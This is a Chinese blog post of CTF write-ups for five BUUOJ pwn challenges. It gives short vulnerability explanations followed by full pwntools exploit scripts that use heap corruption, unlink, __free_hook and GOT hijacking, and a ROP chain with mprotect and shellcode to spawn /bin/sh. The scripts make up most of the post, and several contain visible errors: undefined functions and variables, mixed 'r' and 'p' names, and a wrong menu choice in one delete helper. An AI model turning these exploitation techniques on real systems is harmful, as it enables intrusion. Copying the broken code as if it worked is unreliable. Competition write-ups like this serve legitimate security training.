buuoj Pwn writeup 256-260

最新推荐文章于 2022-03-04 12:11:41 发布
最新推荐文章于 2022-03-04 12:11:41 发布
阅读量369 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yongbaoii/article/details/119620150
博客内容涉及多个CTF挑战的解决方案,涵盖了堆管理漏洞利用、libc地址泄露、free_hook劫持等技术,包括对realloc、free、edit操作的利用,以及通过编辑字符串进行内存控制和got表劫持,最终实现远程命令执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

256 ciscn_2019_s_2

在这里插入图片描述
add
在这里插入图片描述申请一个0x10的chunk,分别放着地址,大小,flag。

edit
在这里插入图片描述有个realloc,一会小心。

show
在这里插入图片描述
这个show就平平无奇。

delete
在这里插入图片描述
free没啥问题。但是他没有管我们刚刚说的结构体里面的flag。

这就导致什么,我们再free了chunk之后,ptr指针没了,但是我们可以edit传入空指针,走一次realloc。

空指针的realloc会发生什么,当我们的size是的时候,realloc会将他释放掉,清理指针的

exp

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

elf = ELF("./256")

r = remote('node4.buuoj.cn',29001)
libc = ELF('./64/libc-2.27.so')

def add(size,content):
		r.sendlineafter('choice:',"1")
		r.sendlineafter('size?>',str(size))
		r.sendafter('content:',content)
def edit(idx,content):
		r.sendlineafter('choice:',"2")
		r.sendlineafter('Index:',str(idx))
		r.sendafter('content:',content)
def show(idx):
		r.sendlineafter('choice:',"3")
		r.sendlineafter('Index:',str(idx))
def delete(idx):
		r.sendlineafter('choice:',str(idx))
		r.sendlineafter('Index:',str(idx))
def edit2(idx):
		r.sendlineafter('choice:',"2")
		r.sendlineafter('Index:',str(idx))

add(0,'')
edit2(0)
delete(0)
add(0x10,p64(0))	#0
add(0x20,'aaa')		#1
show(0)
r.recvuntil('Content: ')
heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0x2a0

add(0x500,'aaa')	#2
add(0,'')			#3
delete(2)
edit(0,p64(heap_base+0x2f0))	
show(1)
r.recvuntil('Content: ')
libc.address = u64(p.recv(6).ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
add(0x500,'/bin/sh\x00')	#2
fuck(3)
delete(3)
add(0x10,p64(libc.sym['__free_hook']))	#3
add(0x10,p64(libc.sym['system']))
delete(2)

r.interactive()

257 qwb2019_one

在这里插入图片描述
add
在这里插入图片描述平平无奇
最多读入0x20个字符。

edit
在这里插入图片描述strchr函数

C 库函数 char *strchr(const char *str, int c) 在参数 str 所指向的字符串中搜索第一次出现字符 c(一个无符号字符)的位置。

这个函数允许我们每次改变一个字节,那我们其实就想干嘛干嘛了……

show
在这里插入图片描述
del
在这里插入图片描述指针也清理掉了。

有个后门函数,输入1$
在这里插入图片描述
有个奇怪的abs。
就是绝对值函数。

我们可以通过edit,来构造chunk,制造unlink,来劫持got表。但是前提是需要计算程序基地址,因为开了pie。
那我们就可以利用到那个abs函数的溢出,来泄露elf的基地址。

我们具体看一下abs怎么做到泄露地址的。
在这里插入图片描述首先传入的是0x80000000.
然后导致rax立马成了0x80000000
在这里插入图片描述
在这里插入图片描述他最后输出的是chunk1里面的指向的chunk的数据,chunk1指向0x3060。

最后输出0x3060里的数据,
在这里插入图片描述其实道理很简单,因为atoi返回的是一个长整型,这就导致我们如果输入负数,符号在八个字节的第一个bit,这就导致一会截断之后我们的数字还是正的,但是我们如果输入一个比较大的数,就比如0x80000000,截断之后四个字节他就变成了负数,%5之后就会得到我们要的-3.

exp

#coding:utf8
from pwn import *

#context.log_level = "debug"

r = remote('node4.buuoj.cn',27097)
#r = process("./257")

elf = ELF('./257')
libc = ELF('./64/libc-2.27.so')
 
def add(string):
    r.sendlineafter('command>>','1')
    r.sendafter('test string:',string)
 
def edit(index,old_c,new_c):
    r.sendlineafter('command>>','2')
    r.sendlineafter('index of the string:',str(index))
    r.sendafter('Which char do you want to edit:',old_c)
    r.sendlineafter('What do you want to edit it into:',new_c)
 
def show(index):
    r.sendlineafter('command>>','3')
    r.sendlineafter('index of the string:',str(index))
 
def delete(index):
    r.sendlineafter('command>>','4')
    r.sendlineafter('index of the string:',str(index))
 
def test(index):
    r.sendlineafter('command>>','12580')
    r.sendlineafter('Do you want to use one?(Y/N)','Y')
    r.sendlineafter('Here are 5 strings to be tested. Which one do you want to test?',str(index))

test(0x80000000)
r.recvuntil('The string:\n')
heap_ptr = u64(r.recv(6).ljust(0x8,'\x00'))
elf_base = heap_ptr - 0x2030C0
free_got = elf_base + elf.got['free']
print 'elf_base=',hex(elf_base)
 
char_table = ''
for i in range(0x20):
   char_table += chr(ord('a')+i)
 
add(char_table) #0
add('b'*0x20) #1
add('/bin/sh\x00') #2
for i in range(0xF):
   add('b'*0x20)

add('c'*0x20)

for i in range(0x18):
   edit(0,'\x00',chr(ord('B') + i))
size = 0x40 * 0x11
edit(0,'\x41\n',p8(size & 0xFF))
edit(0,'\x00',p8((size >> 0x8) & 0xFF))
for i in range(0x17,0x10,-1):
   edit(0,chr(ord('B') + i) + '\n','\x00')
edit(0,chr(ord('B') + 0x10) + '\n',p8(0x30))
fake_chunk = p64(0) + p64(0x31)
fake_chunk += p64(heap_ptr - 0x18) + p64(heap_ptr - 0x10)
for i in range(0x1F,-1,-1):
   edit(0,chr(ord('a')+i)+'\n',fake_chunk[i])

delete(1) #unlink

for i in range(0x18):
   edit(0,'\x00','1')
edit(0,'\xA8\n','\xC8')
for i in range(6):
   edit(0,'\x00',p8((free_got >> (8 * i)) & 0xFF))
   
show(1)
r.recvuntil('The string is:\n')
free_addr = u64(r.recv(6).ljust(0x8,'\x00'))
libc_base = free_addr - libc.sym['free']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
print "libc_base = " + hex(libc_base)

for i in range(6):
   edit(0,p8((free_got >> (8 * i)) & 0xFF) + '\n',p8((free_hook >> (8 * i)) & 0xFF))
#写free_hook


for i in range(6):
   edit(1,'\x00',p8((system_addr >> (8 * i)) & 0xFF))


delete(2)

r.sendline("cat flag")

r.interactive()

258 hxb_pwn300

在这里插入图片描述
在这里插入图片描述看起来是个计算器。

在这里插入图片描述显然就是。

他说先输入要计算多少次。那这个数足够大的时候其实就可以溢出。

exp

from pwn import *
context(os='linux',arch='x86',log_level='debug')

r = remote("node4.buuoj.cn",29365)
elf=ELF('./258')

def add(value):
	r.sendlineafter("5 Save the result",'1')
	r.sendlineafter("input the integer x:",str(value-1))
	r.sendlineafter("input the integer y:",'1')

bss_addr=0x80EB000
read=elf.symbols['read']
mprotect=elf.symbols['mprotect']
pop_eax=0x080bb406
jmp_eax=0x08048f02
pop_ebxesiedi=0x08048913
r.sendlineafter("How many times do you want to calculate:",'40')

for i in range(16):
	add(0)

add(read)
add(pop_ebxesiedi)
add(0)
add(bss_addr)
add(0x50)
add(mprotect)
add(pop_ebxesiedi)
add(bss_addr)
add(0x1000)
add(7)
add(pop_eax)
add(bss_addr)
add(jmp_eax)

r.sendlineafter("5 Save the result",'5')
r.send(asm(shellcraft.sh()))
r.interactive()

259 others_easyheap

在这里插入图片描述
add
在这里插入图片描述普普通通。

edit
在这里插入图片描述
edit溢出。

攻击free_hook就好了。

exp

from pwn import *
#p=process('./easyheap')
elf=ELF('./easyheap')
libc=ELF("./64/libc-2.23.so")
p=remote('node4.buuoj.cn',26139)
def add(size,content):
	p.sendlineafter(':','1')
	p.sendlineafter('Size:',str(size))
	p.sendlineafter('Content:',content)

def edit(idx,size,content):
	p.sendlineafter(':','2')
	p.sendlineafter('id:',str(idx))
	p.sendlineafter('Size:',str(size))
	p.sendafter('Content:',content)

def show():
	p.sendlineafter(':','3')

def delete(idx):
	p.sendlineafter(':','4')
	p.sendlineafter('id:',str(idx))
	
add(0x18,'aaaa')#0
add(0x68,'bbbb')#1
add(0x20,'cccc')#2
add(0x20,'dddd')#3
add(0x30,'/bin/sh\x00')#4
add(0x30,'/bin/sh\x00')#5
payload='a'*0x18+p64(0x91)
edit(0,len(payload),payload)
delete(1)
add(0x18,'')
show()
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-88-0x10
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
add(0x20,'ffff')
payload=p64(0)*4+p64(0)+p64(0x21)+p64(0x50)+p64(free_hook)
edit(3,len(payload),payload)
edit(4,8,p64(system))
delete(5)
#show()
p.interactive()

260 pwnable_bf

在这里插入图片描述
在这里插入图片描述主程序就是输入字符串,然后咔咔一顿循环去执行brainfuck。

在这里插入图片描述那显然你看有可以移动指针p的>,有可以泄露的.有可以改变数字的功能,got表是可写的,所以就是把p指针移动到下面的got表,然后泄露,劫持。

#coding=utf-8
from pwn import *

ptr = 0x0804a0a0
putchar = 0x804a030
jmp = 0x8048671

r = process("./260")

r.recvuntil("type some brainfuck instructions except [ ]\n")

payload="."
payload+="<"*(112-4)+"<."*4+"<"#leak putchar
payload+=">,"*4+"<"*36+">,"*4  #reset puts,fgets
payload+="<"*4+'>'*28+'>,'*4+'.' #reset  memset

r.sendline(payload)
r.recv(1)#这里是为了调用put函数向got表中写入真实地址

puts_addr=u32(p.recv(4)[::-1])
print "puts_addr="+hex(puts_addr)

system_addr=libc.symbols["system"]+puts_addr-libc.symbols["putchar"]
r.send(p32(jmp))
gets_addr=libc.symbols["gets"]+puts_addr-libc.symbols["putchar"]
r.send(p32(system_addr))
r.send(p32(gets_addr))

r.recvuntil("type some brainfuck instructions except [ ]\n")
r.sendline("/bin/sh\x00")

r.interactive()
(BUUCTF)pwnable_bf
xy1458214551的博客
01-12 456
BUUCTF的pwnable_bf题解
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 510
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
二进制安全基础之pwn利器pwntools
kelxLZ的博客
06-24 1496
Author:ZERO-A-ONE Date:2021-06-24 一、深入理解pwntools的使用 1.1 pwntools常用模块 asm:汇编与反汇编 dynelf:远程符号泄露 elf:elf文件操作 gdb:启动gdb调试 shellcraft:shellcode的生成器 cyclic pattern:偏移字符计算 process/remote:读写接口 1.2 汇编与反汇编 将汇编指令转为机器码 >>> asm('nop') '\x90' 将机器码转为汇编指令 &g.
2017湖湘杯pwn100的wp
一个码农的笔记
11-30 2873
湖湘杯的pwn比赛很有趣,我做了pwns100的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.youkuaiyun.com/download/niexinming/10139497 把pwns100直接拖入ida中: main函数: base64解码函数 输入函数 可以看到read可以输入的字符串可以长达0x200个,这里可造成缓冲区溢出漏洞
qwb2019_one(strchr的误用)
seaaseesa的博客
06-11 641
qwb2019_one(strchr的误用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,test功能里abs函数存在溢出,由此可以造成下标越界,进而可以泄露程序的地址。 在edit功能里,strchr可以返回字符串结尾的’\0’的位置,因此可以造成off bu one,我们每一次进行off by one将结尾的\0改掉,这样,我们就可以一步一步的逼近下一个chunk的size处,进而可以修改size 我们可以通过控制size,然后伪造chunk,进行unlink操作,然后
HITCTF PWN300--dynelf
Vccxx的博客
04-08 1124
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 510
Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp
BUU CTF PWN rip WriteUp
m0sway的博客
02-25 5224
BUU CTF PWN题rip的WriteUp
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 439
Buu CTF PWN题jarvisoj_level0的WriteUp
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 699
Buu CTF PWN题ciscn_2019_c_1的WriteUp
2017湖湘杯pwn300
12-03
2017湖湘杯pwn300的题目,请大家自行下载。。。。。。
pwn100的解题过程
weixin_44007796的博客
01-31 1010
pwn100的解题过程 一.先将pwn100这个文件放入到ida中,这是一个32位的文件,F5后点击main函数和getflag函数对pwn100进行分析。 首先,read函数是一个可以将0x100个字节传输到buf指针所指的内存中(0x100u是一个16进制的数,即256,u表示无符号),read函数很容易出问题,点进buf看一看,发现它的内存小于256,大约只有64+4=68。 由于ida...
2017年湖湘杯复赛 pwn100-writeup
aptx4869_li的博客
12-22 1224
2017年湖湘杯复赛 pwn100-writeup 这是本人第一次做出来pwn的题可能有些地方显得比较笨,但尽量把自己所想的每一步都描述清楚。不足之处请批评指正。
小白pwn之旅之pwnable02
qq_41078843的博客
04-28 226
pwnable----bof和flag bof是溢出 flag是加了壳 bof 直接访问上面的两个网址,下载bof和bof.c。用file bof查看bof文件,并用IDA打开 2.查看源代码bof.c #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int k...
强网杯2019逆向 lebel:WASM,XTEA
q1uTruth的博客
08-17 1166
wasm基本功能和jni类比
[BUUCTF-pwn] qwb2019_final_vulntest
weixin_52640415的博客
12-09 306
看exp还想了好久。一是因为这个题加载了太多lib导致本地无法加载相似环境,二是程序本向没用的检查比较不容易看明白,但从exp上看似乎没啥用。 这是个libc2.27的题,加了asan还有libc++等,由于没有对应版本,最后只好在本地用2.31再猜远程的位置,栈里基本是一样的,只是一些符号位置不对 功能菜单 test2_write_card 主程序在内存开辟区域,然后将+0x20的指针给函数,这个函数可以写0x30字节,但没检查上界,可以向上溢出写 test1_write_card可以定7个字符,
web ctf中的计算器
weixin_30275415的博客
06-10 1163
web ctf中的计算器 pre.src {background-color: #292b2e; color: #b2b2b2;} pre.src {background-color: #292b2e; color: #b2b2b2;} pre.src {background-color: #292b2e; color: #b2b2b2;} pre.s...
PWN学习-ADworld刷题
WocW的博客
06-04 1678
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
pwn之stack2
醉等佳人归
09-07 446
1.题目 1.保护机制 开了canary和nx 2.题目 简单来说就是一个计算器,支持以下功能: 2.思路 重点1:问题出在第三个功能上,第三个功能是支持修改数组中的元素的,但函数没有进行index判断,导致我们通过这个偏移写任意数据到任意偏移地址,即可以覆盖函数返回地址 重点2:程序中给了一个后门函数,但是运行后发现没有/bin/bash,所以我们要自己调用system,参数的话直接使用/bin/bash中的sh即可 from pwn import * context(arch="i386",os=
PWN G21.5-0.9脉冲星云光谱分析结果发布
在天文学领域,脉冲星云(Pulsar Wind Nebula,简称PWN)是一种特别的天体现象,它是由高速旋转的脉冲星释放出的粒子风与周围介质相互作用形成的高能辐射云。脉冲星是中子星的一种,它们自转极快,能够周期性地发出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值